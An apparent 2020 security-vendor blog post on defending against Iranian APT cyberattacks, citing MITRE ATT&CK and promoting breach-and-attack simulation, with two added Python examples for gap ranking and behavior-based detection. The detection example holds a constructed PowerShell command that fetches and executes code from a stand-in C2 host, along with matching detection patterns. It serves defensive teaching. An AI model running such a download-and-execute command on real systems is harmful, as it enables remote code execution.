January 8th, 2020
Itzik Kotler, CTO, SafeBreach
You can reduce your risks of attack and permanently improve your security stance by taking some common sense steps to prepare for the coming cyberthreats from Iran.
In the wake of a U.S. attack on January 2 that killed a top Iranian military official in Baghdad, government authorities are warning security and IT teams to brace for more attacks. A January 6, 2020 bulletin from CISA warned of a higher likelihood of cyberattacks, citing Iran’s history of “... Disruptive and destructive cyber operations against strategic targets, including finance, energy, and telecommunications organizations, and an increased interest in industrial control systems and operational technology.”
While generally less sophisticated than state-sponsored cyber-attack groups operating in Russia or China, Iran has built a number of so-called Advanced Persistent Threat (APT) groups that have developed and carried out a wide range of cyberattacks. These groups, such as APT33, APT34 (aka OilRig), APT35 (aka Magic Hound), APT39, CopyKitten and Muddy Water, have leveraged numerous techniques across all MITRE ATT&CK tactics for their attacks. Attack targets have ranged from key infrastructure in the energy industry (including physical system controls) to IT providers to government agencies and even pro-U.S. billionaires. In other words, everything and everyone is fair game.
In the wake of the U.S. attack, a handful of website defacement reports were attributed to Iranian cyber efforts but those are most likely to be “script-kiddie” attacks and not the efforts of the better organized and more sophisticated Iranian APT groups.
All of this said, let’s be honest. The attack changes very little for information security teams. Before this incident, state-sponsored Iranian hackers were consistently and persistently attacking U.S. targets. Perhaps they will redouble their efforts, but the threat has not changed all that much. With that in mind, now is as good a time as ever to ensure your endpoints, networks, infrastructure and software are all protected against an attack by Iran. Here are some key considerations.
Fortunately, modern platforms can automate and streamline many of the key processes required to defend against increased cyberattacks from Iran or any other online adversary. These platforms leverage the MITRE ATT&CK framework and other sources of searchable, documented TTPs to continuously simulate attacks against your specific IT and security infrastructure. Breach-and-attack-simulation (BAS) platforms not only analyze where the gaps in your security are located but also help you prioritize which gaps to remediate based on business risk or other key criteria (presence of PII, critical infrastructure systems, etc.). BAS platforms make managing complex IT topologies less risky by automating many of the key steps needed to test for security gaps and by providing remediation steps to close gaps quickly.
Over 100 TTPs have been associated with Iranian hacking groups by researchers contributing to the MITRE ATT&CK knowledge base. For APT34 (aka OilRig), for example, MITRE lists dozens of techniques and tools spanning malware, Trojans, credential dumping, network scanners, and more. Search through MITRE ATT&CK to identify the TTPs associated with the Iranian groups and make sure your security controls are in place to defend against each of those TTPs. In reality, you should probably have controls in place against most of these TTPs anyway; they generally focus on known vectors and security gaps that every CISO and security team should already be aware of.
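The gap-hunting step described above, reduced to code: take the techniques attributed to the groups you care about, subtract the techniques your deployed controls already cover, and rank what is left by how many groups use it. This is an added example, not SafeBreach or MITRE code; the group-to-technique and control-to-technique mappings are constructed for illustration (the technique IDs are real ATT&CK IDs, but the attributions here are samples, so load the real ones from the ATT&CK knowledge base before acting on the output).

```python
# Added example: rank ATT&CK coverage gaps for a set of threat groups against the
# controls you actually have deployed. All mappings below are CONSTRUCTED samples.
from collections import defaultdict

# Constructed sample: ATT&CK technique IDs each group is assumed to use here.
GROUP_TECHNIQUES = {
    "APT33": {"T1566.001", "T1059.001", "T1003.001", "T1053.005"},
    "APT34": {"T1566.001", "T1059.001", "T1003.001", "T1046", "T1027"},
    "MuddyWater": {"T1566.001", "T1059.001", "T1027", "T1053.005"},
}

# Constructed sample: techniques each deployed control is configured to block or detect.
CONTROL_COVERAGE = {
    "email-gateway": {"T1566.001"},           # spearphishing attachment
    "edr-powershell-logging": {"T1059.001"},  # PowerShell execution
}


def coverage_gaps(groups, group_techniques=GROUP_TECHNIQUES, controls=CONTROL_COVERAGE):
    """Return [(technique_id, [groups using it]), ...] for techniques that no control
    covers, with the most widely used technique first so remediation can be prioritised.
    Ties are broken by technique ID so the output is stable."""
    covered = set().union(*controls.values())
    users = defaultdict(list)
    for group in groups:
        for technique in sorted(group_techniques.get(group, set())):
            if technique not in covered:
                users[technique].append(group)
    return sorted(users.items(), key=lambda kv: (-len(kv[1]), kv[0]))


if __name__ == "__main__":
    for technique, who in coverage_gaps(["APT33", "APT34", "MuddyWater"]):
        print(f"{technique}: no control covers this; used by {', '.join(who)}")
```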
Iranian hacking teams have consistently made small modifications to existing tools and exploit software to evade detection. For example, the BONDUPDATER PowerShell backdoor is a well-known attack tool used by hacking groups linked to Iran, and it has been modified several times by OilRig. To guard against such modified tooling, CISOs and their teams should focus on the behavior part of TTPs and properly configure controls to account for all techniques; relying on signature detection and on finding evidence of specific tools is not enough. Yes, this is basic security hygiene, but imminent threats provide more impetus to take this extra step.
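To make the signature-versus-behavior point concrete, here is an added example (not SafeBreach code and not related to any real BONDUPDATER sample) that triages constructed PowerShell process-creation command lines two ways: an exact-hash signature of one "known tool" build, and a handful of behavior rules describing what a PowerShell backdoor does (hidden window, encoded command, download-then-execute, scheduled-task persistence). A trivially edited copy of the tool slips past the hash but still trips the behavior rules.

```python
# Added example: why behaviour-based rules survive tool modification where hash
# signatures do not. The command lines and the "known tool" are CONSTRUCTED.
import hashlib
import re

# Constructed "known bad" command line standing in for one catalogued backdoor build.
KNOWN_TOOL = ("powershell.exe -NoP -W Hidden -c "
              "\"$u='http://c2.example.invalid/a';while($true){iex (iwr $u)}\"")
# Signature approach: exact hash of the observed command line, as an IoC feed would carry it.
KNOWN_HASHES = {hashlib.sha256(KNOWN_TOOL.encode()).hexdigest()}

# Behaviour approach: rules that describe the technique, not one tool's bytes.
BEHAVIOUR_RULES = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_exec": re.compile(
        r"(?=.*(iwr|invoke-webrequest|downloadstring))(?=.*(iex|invoke-expression))", re.I | re.S),
    "persist_via_task": re.compile(r"schtasks(\.exe)?\s+/create", re.I),
}


def signature_hit(command_line):
    """True only if this exact command line is already in the IoC set."""
    return hashlib.sha256(command_line.encode()).hexdigest() in KNOWN_HASHES


def behaviour_hits(command_line):
    """Names of every behaviour rule the command line trips (empty list if none)."""
    return [name for name, rx in BEHAVIOUR_RULES.items() if rx.search(command_line)]


def triage(events):
    """For each process-creation command line: (signature matched?, behaviour rules tripped)."""
    return [(signature_hit(e), behaviour_hits(e)) for e in events]


# Constructed process-creation command lines, as an EDR or Sysmon would record them.
SAMPLE_EVENTS = [
    KNOWN_TOOL,                                              # the catalogued build
    KNOWN_TOOL.replace("$u", "$x").replace("/a", "/b"),      # same tool, trivially modified
    "powershell.exe -File C:\\scripts\\inventory.ps1 -Verbose",  # benign admin job
]

if __name__ == "__main__":
    for event, (sig, beh) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"signature={sig!s:5} behaviour={beh or '-'}  {event[:60]}")
```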
Savvy APT groups often seek unguarded pathways into organizations by looking for older systems and software that may be nearing end-of-life (EOL) or may no longer be supported with automatic patching by the OEMs and software suppliers. They know that these systems are often painful to maintain properly and may be under less scrutiny. In times of heightened security concerns, CISOs and their teams should carefully scan their security posture for these risks and make firm decisions either to accelerate EOL or to dedicate more resources to patching and monitoring.
With everything now fair game, it’s reasonable to expect that Iranian attack targets will expand and will focus on exacting more pain and causing more chaos for the U.S. and its allies. To date, attacks by Iran have focused more on gathering intelligence and infiltrating infrastructure. Some ransomware attacks have been attributed to Iran. But now, with damage and chaos prioritized, Iran’s APTs may elect to use more destructive attack types such as wipers (which wipe databases and storage drives clean), worms (which spread autonomously and clog corporate networks) and DDoS (Distributed Denial of Service). Low-hanging fruit might include: second-tier financial institutions and exchanges, through which Iran may seek to disrupt financial markets; health care institutions, in which IT plays a critical role; and key U.S. infrastructure such as the power grid and utilities for water and gas. There are numerous single points of failure in these systems which, when compromised, could impact millions of customers and users.
It’s a good time to re-educate your user base on the ABCs of social engineering attacks, like the spearphishing campaign that gave Russian hackers access to the Democratic National Committee’s email servers. These attacks are one of the known TTPs of Iran, and they are a favored tactic for compromising senior targets high up in government and industry. A successful spearphishing attack against a prominent U.S. official, for example, might not only yield Iran useful intelligence and access but would also make for a major propaganda victory and an embarrassing situation for the United States.
Consider the Iran situation yet another dress rehearsal for the future of Cyberwar. In that future, cyberattackers will target numerous critical components of infrastructure seeking to do economic damage and potentially cause physical damage to the power grid, transportation networks or other crucial economic pillars. An increasing volume of attacks is an inevitable reality, considering the rising global tensions between so many of the cyber powerhouses. Preparing for that future proactively by modernizing your security stance with a Breach and Attack Simulation platform today will yield huge dividends down the road.